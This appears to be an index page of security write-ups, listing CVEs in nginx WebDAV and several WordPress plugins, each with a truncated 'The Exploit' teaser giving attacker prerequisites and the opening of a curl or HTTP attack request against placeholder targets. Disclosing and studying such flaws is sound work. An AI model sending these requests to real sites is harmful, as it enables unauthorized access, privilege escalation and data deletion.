Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...

CVE-2025-14797

## The Exploit Authenticated attacker needs Author-level access to the WordPress admin area and the ability to update the Same Category Posts widget settings. ```http POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Cookie: wor...

CVE-2026-0800

## The Exploit An unauthenticated attacker can submit a payload through the front-end post submission form and have it stored inside custom field output. ```bash # 1) store the payload via the front-end submission endpoint curl -sk -X POS...

CVE-2025-15516

## The Exploit Authenticated Subscriber-level users can abuse the plugin's AJAX callback to overwrite arbitrary string user meta on their own account. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application...

CVE-2025-15043

## The Exploit An authenticated WordPress user with subscriber-level access can invoke the custom tables migration AJAX action directly. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-form-ur...

CVE-2025-11924

## The Exploit The attacker needs no WordPress authentication; they only need to send a POST to the token endpoint with a `Referer` header pointing at any page that contains the Ninja Forms Submissions Table block. ```bash curl -i -s -X P...

CVE-2026-1051

## The Exploit Attacker needs a victim who is logged in to the target WordPress site. ```bash curl 'https://TARGET.EXAMPLE/' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'action=uc&u=123&e=victim%40example.com&nk=VI...

CVE-2025-15466

## The Exploit Attacker needs authenticated Contributor-level access or higher and a valid `FinalTiles_gallery` nonce from the plugin’s admin UI. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-ww...

CVE-2025-14351

## The Exploit Unauthenticated attackers can delete the plugin's local font cache simply by visiting the plugin admin page slug. ```bash curl -i -s 'https://target.example.com/?page=bsf-custom-fonts' -o /dev/null -w '%{http_code}\n' ``` ...

CVE-2025-14533

## The Exploit Unauthenticated attackers only need access to a front-end ACF Extended form where the `role` field is mapped to the user-registration action. ```bash curl -i -X POST "http://TARGET/?acf_form=submit" \ -H "Content-Type: ap...
